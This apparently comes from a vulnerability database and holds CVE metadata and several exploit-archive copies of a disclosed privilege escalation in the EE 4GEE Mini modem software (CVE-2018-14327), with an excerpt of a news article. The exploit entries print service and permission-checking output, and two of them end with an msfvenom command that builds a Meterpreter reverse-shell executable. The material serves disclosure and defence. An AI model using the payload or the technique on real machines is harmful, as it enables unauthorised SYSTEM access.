"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14327"], "modified": "2019-07-31T18:45:00", "cpe": ["cpe:/a:custom_simple_rss_project:custom_simple_rss:2.0.6"], "id": "CVE-2019-14327", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14327", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:custom_simple_rss_project:custom_simple_rss:2.0.6:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:52:28", "description": "The installer for the Alcatel OSPREY3_MINI Modem component on EE EE40VB 4G mobile broadband modems with firmware before EE40_00_02.00_45 sets weak permissions (Everyone:Full Control) for the \"Web Connecton\\EE40\" and \"Web Connecton\\EE40\\BackgroundService\" directories, which allows local users to gain privileges, as demonstrated by inserting a Trojan horse ServiceManager.exe file into the \"Web Connecton\\EE40\\BackgroundService\" directory.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-26T22:29:00", "title": "CVE-2018-14327", "type": "cve", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14327"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-14327", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14327", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2021-02-02T06:36:36", "description": "Extreme EXOS 16.x, 21.x, and 22.x allows administrators to read arbitrary files.", "edition": 4, "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.4, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-23T08:29:00", "title": "CVE-2017-14327", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14327"], "modified": "2017-11-08T14:40:00", "cpe": ["cpe:/o:extremenetworks:extremexos:16.2", "cpe:/o:extremenetworks:extremexos:22.1", "cpe:/o:extremenetworks:extremexos:16.1.2", "cpe:/o:extremenetworks:extremexos:21.1.2", "cpe:/o:extremenetworks:extremexos:21.1.3", "cpe:/o:extremenetworks:extremexos:21.1", "cpe:/o:extremenetworks:extremexos:16.1.4", "cpe:/o:extremenetworks:extremexos:21.1.4", "cpe:/o:extremenetworks:extremexos:21.1.1", "cpe:/o:extremenetworks:extremexos:22.3", "cpe:/o:extremenetworks:extremexos:22.2", "cpe:/o:extremenetworks:extremexos:16.2.3", "cpe:/o:extremenetworks:extremexos:16.2.4", "cpe:/o:extremenetworks:extremexos:16.2.2", "cpe:/o:extremenetworks:extremexos:22.4", "cpe:/o:extremenetworks:extremexos:16.1.3"], "id": "CVE-2017-14327", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14327", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:extremenetworks:extremexos:22.2:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:16.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:21.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:16.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:16.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:16.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:21.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:16.2:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:22.1:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:22.3:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:21.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:22.4:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:16.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:21.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:extremenetworks:extremexos:21.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2018-10-07T14:36:10", "description": "EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation. CVE-2018-14327. Local exploit for Windows platform", "published": "2018-09-27T00:00:00", "type": "exploitdb", "title": "EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14327"], "modified": "2018-09-27T00:00:00", "id": "EDB-ID:45501", "href": "https://www.exploit-db.com/exploits/45501/", "sourceData": "# Title: EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation \r\n# Date: 2018-09-22\r\n# Software Version: EE40_00_02.00_44\r\n# Tested on: Windows 10 64-bit and Windows 7 64-bit\r\n# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html\r\n# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/\r\n# CVE: CVE-2018-14327\r\n# References\r\n# https://www.theregister.co.uk/2018/09/19/ee_modem_vuln/\r\n# https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html\r\n\r\n# PoC\r\n\r\nC:\\>sc qc \"Alcatel OSPREY3_MINI Modem Device Helper\"\r\n[SC] QueryServiceConfig SUCCESS\r\n \r\nSERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper\r\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : C:\\Program Files (x86)\\Web Connecton\\EE40\\BackgroundService\\ServiceManager.exe -start\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : Alcatel OSPREY3_MINI Modem Device Helper\r\n DEPENDENCIES :\r\n SERVICE_START_NAME : LocalSystem\r\n\r\n\r\n# Weak Folder Permissions\r\n\r\nC:\\Program Files (x86)\\Web Connecton>icacls EE40\r\nEE40 Everyone:(OI)(CI)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Users:(I)(RX)\r\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\r\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n \r\nSuccessfully processed 1 files; Failed processing 0 files\r\n \r\nC:\\Program Files (x86)\\Web Connecton>\r\nC:\\Program Files (x86)\\Web Connecton>\r\nC:\\Program Files (x86)\\Web Connecton>icacls EE40\\BackgroundService\r\nEE40\\BackgroundService Everyone:(OI)(CI)(F)\r\n Everyone:(I)(OI)(CI)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Users:(I)(RX)\r\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\r\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n \r\nSuccessfully processed 1 files; Failed processing 0 files\r\n\r\n# Example Payload\r\n\r\nmsfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.4 lport=443 -f exe -o rev_shell.exe", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45501/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nEE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation", "edition": 1, "published": "2018-09-27T00:00:00", "title": "EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14327"], "modified": "2018-09-27T00:00:00", "id": "EXPLOITPACK:09489049F2829F83D9F4DA083BB936C0", "href": "", "sourceData": "# Title: EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation \n# Date: 2018-09-22\n# Software Version: EE40_00_02.00_44\n# Tested on: Windows 10 64-bit and Windows 7 64-bit\n# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)\n# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html\n# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/\n# CVE: CVE-2018-14327\n# References\n# https://www.theregister.co.uk/2018/09/19/ee_modem_vuln/\n# https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html\n\n# PoC\n\nC:\\>sc qc \"Alcatel OSPREY3_MINI Modem Device Helper\"\n[SC] QueryServiceConfig SUCCESS\n \nSERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files (x86)\\Web Connecton\\EE40\\BackgroundService\\ServiceManager.exe -start\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : Alcatel OSPREY3_MINI Modem Device Helper\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem\n\n\n# Weak Folder Permissions\n\nC:\\Program Files (x86)\\Web Connecton>icacls EE40\nEE40 Everyone:(OI)(CI)(F)\n NT SERVICE\\TrustedInstaller:(I)(F)\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\n NT AUTHORITY\\SYSTEM:(I)(F)\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\n BUILTIN\\Administrators:(I)(F)\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\n BUILTIN\\Users:(I)(RX)\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\n \nSuccessfully processed 1 files; Failed processing 0 files\n \nC:\\Program Files (x86)\\Web Connecton>\nC:\\Program Files (x86)\\Web Connecton>\nC:\\Program Files (x86)\\Web Connecton>icacls EE40\\BackgroundService\nEE40\\BackgroundService Everyone:(OI)(CI)(F)\n Everyone:(I)(OI)(CI)(F)\n NT SERVICE\\TrustedInstaller:(I)(F)\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\n NT AUTHORITY\\SYSTEM:(I)(F)\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\n BUILTIN\\Administrators:(I)(F)\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\n BUILTIN\\Users:(I)(RX)\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\n \nSuccessfully processed 1 files; Failed processing 0 files\n\n# Example Payload\n\nmsfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.4 lport=443 -f exe -o rev_shell.exe", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-09-25T10:08:56", "description": "", "published": "2018-09-25T00:00:00", "type": "packetstorm", "title": "EE 4GEE Mini Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14327"], "modified": "2018-09-25T00:00:00", "id": "PACKETSTORM:149492", "href": "https://packetstormsecurity.com/files/149492/EE-4GEE-Mini-Local-Privilege-Escalation.html", "sourceData": "`# Title: EE 4GEE Mini Local Privilege Escalation Vulnerability \n# Date: 22-09-2018 \n# Software Version: EE40_00_02.00_44 \n# Tested on: Windows 10 64-bit and Windows 7 64-bit \n# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith) \n# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html \n# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/ \n# CVE: CVE-2018-14327 \n \nUnquoted Service Path Vulnerability \n----------------------------------- \n \nC:\\>sc qc \"Alcatel OSPREY3_MINI Modem Device Helper\" \n[SC] QueryServiceConfig SUCCESS \n \nSERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper \nTYPE : 110 WIN32_OWN_PROCESS (interactive) \nSTART_TYPE : 2 AUTO_START \nERROR_CONTROL : 1 NORMAL \nBINARY_PATH_NAME : C:\\Program Files (x86)\\Web Connecton\\EE40\\BackgroundService\\ServiceManager.exe -start \nLOAD_ORDER_GROUP : \nTAG : 0 \nDISPLAY_NAME : Alcatel OSPREY3_MINI Modem Device Helper \nDEPENDENCIES : \nSERVICE_START_NAME : LocalSystem \n \n \nWeak Folder Permissions \n------------------------ \n \nC:\\Program Files (x86)\\Web Connecton>icacls EE40 \nEE40 Everyone:(OI)(CI)(F) \nNT SERVICE\\TrustedInstaller:(I)(F) \nNT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F) \nNT AUTHORITY\\SYSTEM:(I)(F) \nNT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F) \nBUILTIN\\Administrators:(I)(F) \nBUILTIN\\Administrators:(I)(OI)(CI)(IO)(F) \nBUILTIN\\Users:(I)(RX) \nBUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE) \nCREATOR OWNER:(I)(OI)(CI)(IO)(F) \nAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX) \nAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) \nAPPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) \nAPPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) \n \nSuccessfully processed 1 files; Failed processing 0 files \n \nC:\\Program Files (x86)\\Web Connecton> \nC:\\Program Files (x86)\\Web Connecton> \nC:\\Program Files (x86)\\Web Connecton>icacls EE40\\BackgroundService \nEE40\\BackgroundService Everyone:(OI)(CI)(F) \nEveryone:(I)(OI)(CI)(F) \nNT SERVICE\\TrustedInstaller:(I)(F) \nNT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F) \nNT AUTHORITY\\SYSTEM:(I)(F) \nNT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F) \nBUILTIN\\Administrators:(I)(F) \nBUILTIN\\Administrators:(I)(OI)(CI)(IO)(F) \nBUILTIN\\Users:(I)(RX) \nBUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE) \nCREATOR OWNER:(I)(OI)(CI)(IO)(F) \nAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX) \nAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) \nAPPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) \nAPPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) \n \nSuccessfully processed 1 files; Failed processing 0 files \n \nDisclosure Timeline \n--------------------- \n05-07-2018: The ZeroDayLab Consultant (Osanda Malith Jayathissa), reported the issue to EE via twitter \n05-07-2018: Reported to Alcatel via email. \n12-07-2018: Osanda Malith Jayathissa contacted MITRE. \n16-07-2018: CVE assigned CVE-2018-14327. \n25-07-2018: EE contacted Osanda Malith Jayathissa via email for more technical details. \n26-07-2018: Phone call between Osanda Malith Jayathissa and EE to discuss the vulnerability further. \n26-07-2018: EE confirms that patch will go live within one week. \n03-08-2018: Osanda Malith Jayathissa contacted EE for an update on the patch and EE stated that they will respond with more information by Friday 10th of August. \n10-08-2018: EE said that patch had been delayed and will notify Osanda Malith Jayathissa with an update. \n23-08-2018: EE replies with a patch update for Osanda Malith Jayathissa to verify. The ZeroDayLab Consultant confirmed the patch was working successfully. \n03-09-2018: EE notified Osanda Malith Jayathissa saying the patch was released. \n \nReferences \n----------- \nhttps://www.theregister.co.uk/2018/09/19/ee_modem_vuln/ \nhttps://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149492/ee4gee-escalate.txt"}], "zdt": [{"lastseen": "2018-09-25T16:11:16", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2018-09-25T00:00:00", "title": "EE 4GEE Mini Local Privilege Escalation Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14327"], "modified": "2018-09-25T00:00:00", "id": "1337DAY-ID-31166", "href": "https://0day.today/exploit/description/31166", "sourceData": "# Title: EE 4GEE Mini Local Privilege Escalation Vulnerability \r\n# Software Version: EE40_00_02.00_44\r\n# Tested on: Windows 10 64-bit and Windows 7 64-bit\r\n# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html\r\n# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/\r\n# CVE: CVE-2018-14327 \r\n\r\nUnquoted Service Path Vulnerability\r\n-----------------------------------\r\n\r\nC:\\>sc qc \"Alcatel OSPREY3_MINI Modem Device Helper\"\r\n[SC] QueryServiceConfig SUCCESS\r\n \r\nSERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper\r\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : C:\\Program Files (x86)\\Web Connecton\\EE40\\BackgroundService\\ServiceManager.exe -start\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : Alcatel OSPREY3_MINI Modem Device Helper\r\n DEPENDENCIES :\r\n SERVICE_START_NAME : LocalSystem\r\n\r\n\r\nWeak Folder Permissions\r\n------------------------\r\n\r\nC:\\Program Files (x86)\\Web Connecton>icacls EE40\r\nEE40 Everyone:(OI)(CI)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Users:(I)(RX)\r\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\r\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n \r\nSuccessfully processed 1 files; Failed processing 0 files\r\n \r\nC:\\Program Files (x86)\\Web Connecton>\r\nC:\\Program Files (x86)\\Web Connecton>\r\nC:\\Program Files (x86)\\Web Connecton>icacls EE40\\BackgroundService\r\nEE40\\BackgroundService Everyone:(OI)(CI)(F)\r\n Everyone:(I)(OI)(CI)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Users:(I)(RX)\r\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\r\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n \r\nSuccessfully processed 1 files; Failed processing 0 files\r\n\r\nDisclosure Timeline\r\n---------------------\r\n05-07-2018: The ZeroDayLab Consultant (Osanda Malith Jayathissa), reported the issue to EE via twitter\r\n05-07-2018: Reported to Alcatel via email.\r\n12-07-2018: Osanda Malith Jayathissa contacted MITRE.\r\n16-07-2018: CVE assigned CVE-2018-14327.\r\n25-07-2018: EE contacted Osanda Malith Jayathissa via email for more technical details.\r\n26-07-2018: Phone call between Osanda Malith Jayathissa and EE to discuss the vulnerability further.\r\n26-07-2018: EE confirms that patch will go live within one week.\r\n03-08-2018: Osanda Malith Jayathissa contacted EE for an update on the patch and EE stated that they will respond with more information by Friday 10th of August.\r\n10-08-2018: EE said that patch had been delayed and will notify Osanda Malith Jayathissa with an update.\r\n23-08-2018: EE replies with a patch update for Osanda Malith Jayathissa to verify. The ZeroDayLab Consultant confirmed the patch was working successfully.\r\n03-09-2018: EE notified Osanda Malith Jayathissa saying the patch was released.\r\n\r\nReferences\r\n-----------\r\nhttps://www.theregister.co.uk/2018/09/19/ee_modem_vuln/\r\nhttps://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html\n\n# 0day.today [2018-09-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31166"}], "thn": [{"lastseen": "2018-09-21T09:59:12", "bulletinFamily": "info", "cvelist": ["CVE-2018-14327"], "description": "[](<https://1.bp.blogspot.com/-65YYEpMj4nY/W6SuDTxkjeI/AAAAAAAAyLY/s7ebAQDcL6QcUtm14o8DIXGozH00KxIGACLcBGAs/s728-e100/4g-ee-wifi-modem-hack.jpg>)\n\nA high-severity vulnerability has been discovered in 4G-based wireless 4GEE Mini modem sold by mobile operator EE that could allow an attacker to run a malicious program on a targeted computer with the highest level of privileges in the system. \n \nThe vulnerability\u2014discovered by 20-year-old **Osanda Malith**, a Sri Lankan security researcher at ZeroDayLab\u2014can be exploited by a low privileged user account to escalate privileges on any Windows computer that had once connected to the EE Mini modem via USB. \n \nThis, in turn, would allow an attacker to gain full system access to the targeted remote computer and thereby, perform any malicious actions, such as installing malware, rootkits, keylogger, or stealing personal information. \n\n\n \n4G Mini WiFi modem is manufactured by Alcatel and sold by EE, a mobile operator owned by BT Group\u2014 Britain's largest digital communications company that serves over 31 million connections across its mobile, fixed and wholesale networks. \n \n\n\n### How Does the Attack Work?\n\n \nThe local privilege escalation flaw, tracked as CVE-2018-14327, resides in the driver files installed by EE 4G Mini WiFi modem on a Windows system and originates because of folder permissions, allowing any low privileged user to \"read, write, execute, create, delete do anything inside that folder and it's subfolders.\" \n \nFor successful exploitation of the vulnerability, all an attacker or malware just needs to do is replace \"ServiceManager.exe\" file from the driver folder with a malicious file to trick the vulnerable driver into executing it with higher SYSTEM privileges after reboot. \n\n\nMalith also posted a video demonstration showing that how attackers can exploit this flaw to escalate their privileges on a Windows machine to gain a reverse shell. \n\n\n> \"An attacker can plant a reverse shell from a low privileged user account and by restarting the computer, the malicious service will be started as \"NT AUTHORITY\\SYSTEM\" by giving the attacker full system access to the remote PC,\" he [explains](<https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/>) in his blog.\n\n \n\n\n### 